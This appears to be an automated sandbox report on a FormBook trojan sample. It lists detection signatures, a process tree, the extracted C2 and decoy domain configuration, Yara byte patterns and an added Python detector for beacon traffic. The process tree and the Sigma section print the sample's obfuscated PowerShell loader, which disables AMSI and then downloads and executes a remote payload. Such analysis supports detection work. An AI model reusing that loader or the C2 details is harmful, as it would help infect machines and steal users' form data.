

Windows Analysis Report s2rsXUiUn8

Overview

General Information

Sample Name: s2rsXUiUn8 (renamed file extension from none to exe)
Analysis ID: 452684
MD5: f5041ec4ce468a07ecbfd076bc0f879b
SHA1: bda8cea1ec8d1cea253fc661559cd84cee2195b9
SHA256: caff14d450514a35eac5ba34b3e74126360662d7c8fdf60a8008a0e3bb8ed0b3
Tags: exe trojan


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious PowerShell Command Line
Tries to detect virtualization through RDTSC time measurements
Very long command line found
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match


Process Tree

  • System is w10x64
  • s2rsXUiUn8.exe (PID: 4440 cmdline: 'C:\Users\user\Desktop\s2rsXUiUn8.exe' MD5: F5041EC4CE468A07ECBFD076BC0F879B)
    • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5116 cmdline: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,
41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,49,56,53,55,54,48,56,48,49,53,57,48,50,47,111,97,100,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,11
1,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($676544567888888888876545666778)|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)
      • calc.exe (PID: 5856 cmdline: {path} MD5: 0975EE4BD09E87C94861F69E4AA44B7A)
        • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • help.exe (PID: 3552 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
            • cmd.exe (PID: 4344 cmdline: /c del 'C:\WINDOWS\syswow64\calc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.homekeycap.com/pjje/"], "decoy": ["itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com", "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com", "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com", "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com", "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com", "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com", "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz", "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com", "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com", "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com", "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online", "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com", "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com", "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com", "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com", "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com"]}
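A FormBook configuration is a single C2 URI path plus a long list of decoy domains: the bot beacons with the same path to hosts drawn from the whole list, so the operator's server hides among real, unrelated sites. That is why the GET recorded further down goes to www.rajuherbalandspicegarden.com, a decoy, yet still uses the configured /pjje/ path. The following Python detector is an added example, not part of the report: it turns the extracted configuration into a host set and path set, then classifies constructed proxy log lines (the "client host method url" line format is assumed; the second line mirrors the request seen in the Networking section). A path match on any configured host is the strong signal; a configured host with another path is only a weak one, because the decoys are legitimate sites.

```python
import re
from urllib.parse import urlsplit

# The configuration as extracted in the report (C2 URI plus decoy domains).
CONFIG = {
    "C2 list": ["www.homekeycap.com/pjje/"],
    "decoy": [
        "itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com",
        "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com",
        "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com",
        "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com",
        "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com",
        "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com",
        "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz",
        "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com",
        "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com",
        "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com",
        "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online",
        "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com",
        "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com",
        "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com",
        "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com",
        "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com",
    ],
}

# Constructed proxy log lines (assumed "client host method url" format, not from
# the report). Line 2 reproduces the GET observed in the Networking section.
PROXY_LOG = """\
192.168.2.5 www.google.com GET /search?q=formbook
192.168.2.5 www.rajuherbalandspicegarden.com GET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH
192.168.2.5 www.rajuherbalandspicegarden.com GET /index.html
192.168.2.5 www.homekeycap.com POST /pjje/
"""

LINE_RE = re.compile(r"^(?P<client>\S+)\s+(?P<host>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)$")
B64ISH = re.compile(r"[A-Za-z0-9+/=_-]+")


def _bare(host):
    """Compare on the registrable name; the bot prefixes www. itself."""
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def c2_endpoints(cfg):
    """Hosts the bot may contact (real C2 plus decoys) and the URI paths it uses."""
    hosts, paths = set(), set()
    for entry in cfg["C2 list"]:
        parts = urlsplit("http://" + entry)
        hosts.add(_bare(parts.hostname))
        paths.add(parts.path)
    hosts.update(_bare(d) for d in cfg["decoy"])
    return hosts, paths


def formbook_query_shape(url):
    """Observed beacon: two random-named parameters, base64-like values, one of them long."""
    query = urlsplit(url).query            # urlsplit keeps '+' intact, parse_qs would not
    pairs = [p.split("=", 1) for p in query.split("&") if p]
    if len(pairs) != 2 or any(len(p) != 2 for p in pairs):
        return False
    values = [v for _, v in pairs]
    return all(B64ISH.fullmatch(v) for v in values) and max(map(len, values)) >= 32


def scan(log, cfg):
    """Return (host, path, verdict, beacon_shaped_query) for lines touching configured hosts."""
    hosts, paths = c2_endpoints(cfg)
    hits = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m or _bare(m["host"]) not in hosts:
            continue
        path = urlsplit(m["url"]).path
        verdict = "c2_beacon" if path in paths else "config_host_other_path"
        hits.append((m["host"], path, verdict, formbook_query_shape(m["url"])))
    return hits


if __name__ == "__main__":
    for host, path, verdict, shaped in scan(PROXY_LOG, CONFIG):
        print(f"{verdict:24} {host}{path}  beacon-shaped query: {shaped}")
```

For blocking, the same c2_endpoints() output feeds a proxy deny rule on the path rather than on the 64 hosts, since most of the hosts are someone else's legitimate web sites.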

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      9.2.calc.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        9.2.calc.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.2.calc.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x183f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1850c:$sqlite3step: 68 34 1C 7B E1
        • 0x18428:$sqlite3text: 68 38 2A 90 C5
        • 0x1854d:$sqlite3text: 68 38 2A 90 C5
        • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
        9.2.calc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          9.2.calc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          System Summary:

          Sigma detected: Suspicious PowerShell Command Line
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,
39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,
          Sigma detected: Non Interactive PowerShell
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,
99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,

          Jbx Signature Overview



          AV Detection:

          Found malware configuration
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook {"C2 list": ["www.homekeycap.com/pjje/"], "decoy": ["itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com", "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com", "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com", "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com", "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com", "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com", "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz", "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com", "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com", "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com", "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online", "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com", "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com", "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com", "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com", "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com"]}
          Multi AV Scanner detection for submitted file
          Source: s2rsXUiUn8.exe; Metadefender: Detection: 17%
          Source: s2rsXUiUn8.exe; ReversingLabs: Detection: 57%
          Yara detected FormBook
          Source: Yara match; File source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
